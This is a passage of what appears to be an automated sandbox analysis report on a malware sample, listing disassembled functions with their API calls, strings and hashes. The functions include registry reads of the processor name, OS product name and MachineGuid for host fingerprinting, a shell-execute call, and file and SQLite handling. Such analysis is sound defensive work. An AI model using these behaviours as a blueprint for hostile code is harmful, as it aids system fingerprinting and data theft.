std::bad_exception::bad_exception.LIBCMT ref: 00460974
__CxxThrowException@8.LIBCMT ref: 00460982
std::locale::facet::_Incref.LIBCPMT ref: 00460992
std::locale::facet::_Facet_Register.LIBCPMT ref: 00460998

Strings

bad cast, xrefs: 0046096C

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 1335069804-3145022300
Opcode ID: c48ab1b2f1f135ec407bc1547271380b32de499c0641ae89cedb50f1f6bbc462
Instruction ID: 800db00cbfe093cd91f9157c23405ebb92a752ca1e336e7a37fc27c6c668a911
Opcode Fuzzy Hash: c48ab1b2f1f135ec407bc1547271380b32de499c0641ae89cedb50f1f6bbc462
Instruction Fuzzy Hash: B201A17190021597CF01FBA28852ABEB325AF40728F14092FE5107B2D1FF3C9901875F

Uniqueness

Uniqueness Score: -1.00%

Function 004109F1, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004109F8
std::_Lockit::_Lockit.LIBCPMT ref: 00410A02
int.LIBCPMT ref: 00410A19

Part of subcall function 0040E7B8: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7C9

std::locale::_Getfacet.LIBCPMT ref: 00410A22
ctype.LIBCPMT ref: 00410A3C
std::bad_exception::bad_exception.LIBCMT ref: 00410A50
__CxxThrowException@8.LIBCMT ref: 00410A5E
std::locale::facet::_Incref.LIBCPMT ref: 00410A6E
std::locale::facet::_Facet_Register.LIBCPMT ref: 00410A74

Strings

bad cast, xrefs: 00410A48

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2043575007-3145022300
Opcode ID: 69d2897d87b9b67f46d5e6e37882065d2a01df67e0b53aa72452561214cd4f7a
Instruction ID: 1c251e124c4aa81dac1a78aea5f85a26e5c8ae42b903b9cfe760375f7776386f
Opcode Fuzzy Hash: 69d2897d87b9b67f46d5e6e37882065d2a01df67e0b53aa72452561214cd4f7a
Instruction Fuzzy Hash: 4A017031900215A7CF01EBA2C852AFD73256F50368F50492FE0117B2D1DF7C9A42875A

Uniqueness

Uniqueness Score: -1.00%

Function 00460A7B, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00460A82
std::_Lockit::_Lockit.LIBCPMT ref: 00460A8C
int.LIBCPMT ref: 00460AA3

Part of subcall function 0040E7B8: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7C9

std::locale::_Getfacet.LIBCPMT ref: 00460AAC
numpunct.LIBCPMT ref: 00460AC6
std::bad_exception::bad_exception.LIBCMT ref: 00460ADA
__CxxThrowException@8.LIBCMT ref: 00460AE8
std::locale::facet::_Incref.LIBCPMT ref: 00460AF8
std::locale::facet::_Facet_Register.LIBCPMT ref: 00460AFE

Strings

bad cast, xrefs: 00460AD2

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2348202366-3145022300
Opcode ID: 05fd7c34bfcf1f17db310db6b7e9d8863a2eb9f4c45e577d27e34cf1b3ddeea8
Instruction ID: 20169ad5b693e6324cd60224f55c9eecac8d4d802eb2ac586a2384f31acb5ef6
Opcode Fuzzy Hash: 05fd7c34bfcf1f17db310db6b7e9d8863a2eb9f4c45e577d27e34cf1b3ddeea8
Instruction Fuzzy Hash: 58015B71900215A7CF05FBA28852ABE7335AB50728F64492FE4117B2D1EF3C9A01979A

Uniqueness

Uniqueness Score: -1.00%

Function 00410E89, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00410E90
std::_Lockit::_Lockit.LIBCPMT ref: 00410E9A
int.LIBCPMT ref: 00410EB1

Part of subcall function 0040E7B8: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7C9

std::locale::_Getfacet.LIBCPMT ref: 00410EBA
messages.LIBCPMT ref: 00410ED4
std::bad_exception::bad_exception.LIBCMT ref: 00410EE8
__CxxThrowException@8.LIBCMT ref: 00410EF6
std::locale::facet::_Incref.LIBCPMT ref: 00410F06
std::locale::facet::_Facet_Register.LIBCPMT ref: 00410F0C

Strings

bad cast, xrefs: 00410EE0

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2153951062-3145022300
Opcode ID: a2e21260ee336cd43d9c0f2395cf94b85caf3c407016375bae86d951801a276d
Instruction ID: 61b2da171b5c383875de550d1dfc48e72df4e39e4aed37b38241cebbbe404744
Opcode Fuzzy Hash: a2e21260ee336cd43d9c0f2395cf94b85caf3c407016375bae86d951801a276d
Instruction Fuzzy Hash: 7D016571900215A7CF15FBA28852AFE73256F40728F54092FE011772D1DF7C9981975E

Uniqueness

Uniqueness Score: -1.00%

Function 004047F3, Relevance: 16.7, APIs: 11, Instructions: 152stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004047FD

Part of subcall function 0040D98D: _memset.LIBCMT ref: 0040D99B
Part of subcall function 0040D98D: _strcpy_s.LIBCMT ref: 0040D9B1
Part of subcall function 0040D98D: _memset.LIBCMT ref: 0040D9CC

_memset.LIBCMT ref: 00404831
_memset.LIBCMT ref: 0040483F
_strtok.LIBCMT ref: 00404865
lstrcatA.KERNEL32(?,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404889
lstrcatA.KERNEL32(?,00000000,?,00000010,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 004048AF
lstrcatA.KERNEL32(?,00000001,00000000,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 004048CC
lstrcatA.KERNEL32(?,?,00000000,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404902
lstrcatA.KERNEL32(?,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404911
ShellExecuteA.SHELL32(00000000,00000000,?,004866C4,00000000,00000000), ref: 004049C1

Part of subcall function 0040DA17: _memset.LIBCMT ref: 0040DA21

_strtok.LIBCMT ref: 004049DA

Part of subcall function 004688DD: __getptd.LIBCMT ref: 004688FB

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memsetlstrcat$_strtok$ExecuteH_prolog3_Shell__getptd_strcpy_s
String ID:
API String ID: 230071149-0
Opcode ID: 83fa0937f682366dfaf4a5679675decefe683483a13ef40f71c55bfc4364631c
Instruction ID: 6cb4ba65126060bb4181388c3137efbb85f43890f1f0bd6b29fb056dab01c591
Opcode Fuzzy Hash: 83fa0937f682366dfaf4a5679675decefe683483a13ef40f71c55bfc4364631c
Instruction Fuzzy Hash: 12512EB180015DAEDB25EB61CD85FDE777CEB54344F0001EAA109A7191EB786F88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004640BA, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 004640EF
GetFileSize.KERNEL32(?,00000000), ref: 00464169
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00464185
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00464199
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 004641A2
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 004641B2
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004641D0
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 004641E0

Strings

, xrefs: 0046413C

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 4e19c4db93a4051d2f4a8d1eff20a3110b757cef799e5d23a5153cbf3cbd9fbc
Instruction ID: 21a731f469153e2fdcf5f96811ba4dacf2a2691e627a22fb3fa171e390bd8f08
Opcode Fuzzy Hash: 4e19c4db93a4051d2f4a8d1eff20a3110b757cef799e5d23a5153cbf3cbd9fbc
Instruction Fuzzy Hash: B16102B1D00218AFDF24DFD9D885AAEBBB8EB84744F10442AE511E7260E7389D458F55

Uniqueness

Uniqueness Score: -1.00%

Function 0042AE7E, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 181COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0042AEE5
__fprintf_l.LIBCMT ref: 0042B073

Part of subcall function 0041E17B: _memset.LIBCMT ref: 0041E198

Strings

winFullPathname2, xrefs: 0042B01F
winFullPathname3, xrefs: 0042AF3B
dF, xrefs: 0042AF1E, 0042AF72
winFullPathname1, xrefs: 0042AFD3
%s%c%s, xrefs: 0042AEDC
winFullPathname4, xrefs: 0042AF95

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l$_memset
String ID: dF$%s%c%s$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
API String ID: 639243752-3607313736
Opcode ID: 04e0b5d97a0bcaa742fd05cbbafea1f00044308027bf540e789a7182891bf766
Instruction ID: aee7812005c931190ddb00e205358bb4dcf92abc4503864f1985115b8d862045
Opcode Fuzzy Hash: 04e0b5d97a0bcaa742fd05cbbafea1f00044308027bf540e789a7182891bf766
Instruction Fuzzy Hash: DA516D31604324ABDB11AF22AD05EAF37D9DF85754F59402BFD0486241EB3C8852C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 00422616, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 004226D5
__fprintf_l.LIBCMT ref: 0042271A
_memmove.LIBCMT ref: 0042275D
__fprintf_l.LIBCMT ref: 0042278A

Strings

, xrefs: 0042268D
CREATE TABLE , xrefs: 004226CC
, , xrefs: 00422694

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l$_memmove
String ID: $, $CREATE TABLE
API String ID: 3461008893-3459038510
Opcode ID: 5c33e7ace7292879ad8dc57417dcd67be40a58928b763bbd1da8433520f2400a
Instruction ID: f97827aed83b6e12af874a8a5ec9d36dcdd807d13f615b38b343809ace9d1c0e
Opcode Fuzzy Hash: 5c33e7ace7292879ad8dc57417dcd67be40a58928b763bbd1da8433520f2400a
Instruction Fuzzy Hash: 49518372E0021AEFCF10EF99D5819EFBBF5EF48308F60445BE844A7201E7789A458B95

Uniqueness

Uniqueness Score: -1.00%

Function 0046AE7A, Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0046AE9F
__calloc_crt.LIBCMT ref: 0046AEAB
__getptd.LIBCMT ref: 0046AEB8
CreateThread.KERNEL32 ref: 0046AEEF
GetLastError.KERNEL32(?,00000000,?,0041E5FB,00000000,00000000,00415D34,00000000,00000000,00000004), ref: 0046AEF9
_free.LIBCMT ref: 0046AF02
__dosmaperr.LIBCMT ref: 0046AF0D

Part of subcall function 0046DC0D: __getptd_noexit.LIBCMT ref: 0046DC0D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: 4739e2689e679f15cd7f70f5e8ba8fdfc8a2373b5eb9ad00c84504e14a97e4d2
Instruction ID: 13470287a8e2ec7ebe0f264cfa3cb1bb31d4cce0ca8e68d2fd9c288faa3e0a90
Opcode Fuzzy Hash: 4739e2689e679f15cd7f70f5e8ba8fdfc8a2373b5eb9ad00c84504e14a97e4d2
Instruction Fuzzy Hash: A111E932205B05AFD715AFB6DC4599F37D8EF44764710402FF51496152FB79CC108AAB

Uniqueness

Uniqueness Score: -1.00%

Function 0045EAD3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EB15
RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000000,?,?,?,00000001), ref: 0045EB50
RegCloseKey.ADVAPI32(?,?,00000001), ref: 0045EB59
CharToOemA.USER32(?,?), ref: 0045EB6A

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0045EB27
ProcessorNameString, xrefs: 0045EB48

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: CharCloseQueryValue_memset
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
API String ID: 1144570264-2804670039
Opcode ID: b50a44a85c2f781d04d2da8744f264e0f4f10e90d2ed8e355e10508c84bd7b46
Instruction ID: 4e22463f39fdf4bc7053798bd4095148c6f6f5d5736c80a85079ed57b9d04887
Opcode Fuzzy Hash: b50a44a85c2f781d04d2da8744f264e0f4f10e90d2ed8e355e10508c84bd7b46
Instruction Fuzzy Hash: 24117CB1A0024DAFEB30DFA4DC84BEE7BACFB14348F10443AE919D7151EA745A088F65

Uniqueness

Uniqueness Score: -1.00%

Function 0045EC1B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EC5D
RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,?,?), ref: 0045EC98
RegCloseKey.ADVAPI32(?), ref: 0045ECA1
CharToOemA.USER32(?,?), ref: 0045ECB2

Strings

ProductName, xrefs: 0045EC90
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0045EC6F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: CharCloseQueryValue_memset
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1144570264-1787575317
Opcode ID: 2c3f049942e36c57c9427da0b1458d520b54998c878edb2fe0c37332e7f5e211
Instruction ID: 5d6a27dcfb6a79713c27c2e0e81a07c2d94549ace0d359d4a2c76f5afcfdaaa8
Opcode Fuzzy Hash: 2c3f049942e36c57c9427da0b1458d520b54998c878edb2fe0c37332e7f5e211
Instruction Fuzzy Hash: 45113DB190024DAFEB30DFA4DC85AEE7BACEB14348F10443AE919D7151EA745A088B65

Uniqueness

Uniqueness Score: -1.00%

Function 0045ED9A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EDDC
RegQueryValueExA.ADVAPI32(?,MachineGuid,00000000,00000000,?,?,?,?,00000000), ref: 0045EE17
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0045EE20
CharToOemA.USER32(?,?), ref: 0045EE31

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0045EDEE
MachineGuid, xrefs: 0045EE0F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: CharCloseQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1144570264-1211650757
Opcode ID: 3717a59577e82c817244a7e385d99d30398aaefdd91dd725668a1d0fbcfcc9ae
Instruction ID: b538c6fb36ad256af77995ad4c15771f44e9ea375ebfe1db66a1e931905c167d
Opcode Fuzzy Hash: 3717a59577e82c817244a7e385d99d30398aaefdd91dd725668a1d0fbcfcc9ae
Instruction Fuzzy Hash: 02117CB160024DAFEB30EFA4DC85BEE7BACFB14348F10447AE919D7151EA745A088F65

Uniqueness

Uniqueness Score: -1.00%

Function 0046CE73, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 0046CE7A

Part of subcall function 00470224: GetLastError.KERNEL32(?,00000001,0046DC12,00469517,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 00470228
Part of subcall function 00470224: ___set_flsgetvalue.LIBCMT ref: 00470236
Part of subcall function 00470224: __calloc_crt.LIBCMT ref: 0047024A
Part of subcall function 00470224: DecodePointer.KERNEL32(00000000,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 00470264
Part of subcall function 00470224: GetCurrentThreadId.KERNEL32 ref: 0047027A
Part of subcall function 00470224: SetLastError.KERNEL32(00000000,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 00470292

__calloc_crt.LIBCMT ref: 0046CE9C
__get_sys_err_msg.LIBCMT ref: 0046CEBA
_strcpy_s.LIBCMT ref: 0046CEC2
__invoke_watson.LIBCMT ref: 0046CED7

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 0046CE87, 0046CEAA

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 09de2a254d5f60addb066491253ff5272d4cffaa4472ceb0252909ee0846c407
Instruction ID: 5f8f8d3137c29c53dde8b2f65cf7be9d1a369c4ca7d20f1cfd12bd108f797039
Opcode Fuzzy Hash: 09de2a254d5f60addb066491253ff5272d4cffaa4472ceb0252909ee0846c407
Instruction Fuzzy Hash: F7F02272A042046ADB242A6ADDC183B7AA89B90728720453FF58493201F67E9C0142DF

Uniqueness

Uniqueness Score: -1.00%

Function 00470170, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00499438,00000008,00470278,00000000,00000000,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 00470181
__lock.LIBCMT ref: 004701B5

Part of subcall function 004729F9: __mtinitlocknum.LIBCMT ref: 00472A0F
Part of subcall function 004729F9: __amsg_exit.LIBCMT ref: 00472A1B
Part of subcall function 004729F9: EnterCriticalSection.KERNEL32(00000000,00000000,?,004701BA,0000000D), ref: 00472A23

InterlockedIncrement.KERNEL32(?), ref: 004701C2
__lock.LIBCMT ref: 004701D6
___addlocaleref.LIBCMT ref: 004701F4

Strings

KERNEL32.DLL, xrefs: 0047017C

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 209ef70f394339e3cf92b596a26cbf54b4e1bfd7e88f66bc234e1ecbcd55264d
Instruction ID: 24e721330cc58667b7c3b2b42b23f900a679c81292445a0b21c9df83059ed74a
Opcode Fuzzy Hash: 209ef70f394339e3cf92b596a26cbf54b4e1bfd7e88f66bc234e1ecbcd55264d
Instruction Fuzzy Hash: 4B0161B1581B00EFEB209F7AD905749FBE0BF50315F10895FE499563A1CBB8AA44CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0046AE15, Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0046AE1B

Part of subcall function 004700E2: TlsGetValue.KERNEL32(00000001,0047023B,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 004700EB
Part of subcall function 004700E2: DecodePointer.KERNEL32(?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 004700FD
Part of subcall function 004700E2: TlsSetValue.KERNEL32(00000000,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 0047010C

___fls_getvalue@4.LIBCMT ref: 0046AE26

Part of subcall function 004700C2: TlsGetValue.KERNEL32(?,?,0046AE2B,00000000), ref: 004700D0

___fls_setvalue@8.LIBCMT ref: 0046AE39

Part of subcall function 00470116: DecodePointer.KERNEL32(?,?,?,0046AE3E,00000000,?,00000000), ref: 00470127

GetLastError.KERNEL32(00000000,?,00000000), ref: 0046AE42
ExitThread.KERNEL32 ref: 0046AE49
GetCurrentThreadId.KERNEL32 ref: 0046AE4F
__freefls@4.LIBCMT ref: 0046AE6F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: 99437fb885bb50426bd6178ae67086b9c5fb5be92b5721f1a8155e23dc5250b6
Instruction ID: 4c9d2c4dac5eb3cd2c714a391fb37bb3f7c624402a39c53fea5409e1cc9f7365
Opcode Fuzzy Hash: 99437fb885bb50426bd6178ae67086b9c5fb5be92b5721f1a8155e23dc5250b6
Instruction Fuzzy Hash: 35F06270002640EBC704BF72D94998F7BA99E44714310C55EB40897223EB3DD9428BAA

Uniqueness

Uniqueness Score: -1.00%

Function 004488F3, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 405COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00448AB7

Strings

%s-mjXXXXXX9XXz, xrefs: 00448A4D
MJ collide: %s, xrefs: 00448A82
-mj%06X9%02X, xrefs: 00448AAD
MJ delete: %s, xrefs: 00448AD9

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l
String ID: %s-mjXXXXXX9XXz$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
API String ID: 3906573944-4034981963
Opcode ID: e584f22cd2d7932d36500750a0ecdc87cdca3323a9084b6789c43a0cc4e80604
Instruction ID: 468b0a5307c752ae4d2b5af570c6b5af53a0ac04e0c6929eeffc23e509c981fe
Opcode Fuzzy Hash: e584f22cd2d7932d36500750a0ecdc87cdca3323a9084b6789c43a0cc4e80604
Instruction Fuzzy Hash: E3E13A70E01219EBDB25DF95C881AAEBBB1FF04714F24445FE904AB341DB789E81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040EACF, Relevance: 9.1, APIs: 6, Instructions: 62filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040EAE7
GetFileSizeEx.KERNEL32(00000000,?), ref: 0040EAFE
LocalAlloc.KERNEL32(00000040,?), ref: 0040EB1A
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040EB34
LocalFree.KERNEL32(?), ref: 0040EB4A
CloseHandle.KERNEL32(?), ref: 0040EB55

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 9f7d2ef30889df09825cfe2cbf95f0839c283ce1f4609981c871af615eaf40d6
Instruction ID: 51c342eb8935f4cb8339c732b6cf9f7c1a46ce14fd6dceaa441be4c2a9db9837
Opcode Fuzzy Hash: 9f7d2ef30889df09825cfe2cbf95f0839c283ce1f4609981c871af615eaf40d6
Instruction Fuzzy Hash: F111FE71500205AFDB10AFA5DC88AAEBB78FB05715F240D39F652B2290D735AE549B14

Uniqueness

Uniqueness Score: -1.00%

Function 0042CB39, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042CC3F
_memmove.LIBCMT ref: 0042CD5D

Strings

foreign key on %s should reference only one column of table %T, xrefs: 0042CB96
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042CBBE
unknown column "%s" in foreign key definition, xrefs: 0042CD2D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 4104443479-272990098
Opcode ID: 8186ff913515fe5760de9ecfc77c7cb5e309581da0cb1faefa8fe3c60fad12af
Instruction ID: 7c46a1c970bae7b937feac7288e6ec04c161cb7d504dad499a46815badd4ced4
Opcode Fuzzy Hash: 8186ff913515fe5760de9ecfc77c7cb5e309581da0cb1faefa8fe3c60fad12af
Instruction Fuzzy Hash: 29915D71A00615DFCB10DF59D481AAEBBF1FF48304B54856FE805AB312D739EA42CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB5E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CB9E
_memmove.LIBCMT ref: 0040CC61
std::_Xinvalid_argument.LIBCPMT ref: 0040CC81

Strings

invalid string position, xrefs: 0040CC7C
string too long, xrefs: 0040CB99

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: a2a87552bb41c9bd0c400c777de9ccc6d7716b2b75f90ad2abe938e844a6728e
Instruction ID: dbbb9051b5ff07be1a5e1451d20534c1fc2bfbb3edb8f9b48bbb73265079a5a6
Opcode Fuzzy Hash: a2a87552bb41c9bd0c400c777de9ccc6d7716b2b75f90ad2abe938e844a6728e
Instruction Fuzzy Hash: 6B41B270304105DBDB14DF58D9C096A73B6EF867447204A3EE806EB291E778ED46C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041246C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00412473
_memset.LIBCMT ref: 004124CE
LocalAlloc.KERNEL32 ref: 00412509

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

v10, xrefs: 0041249C
NULL, xrefs: 00412580

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

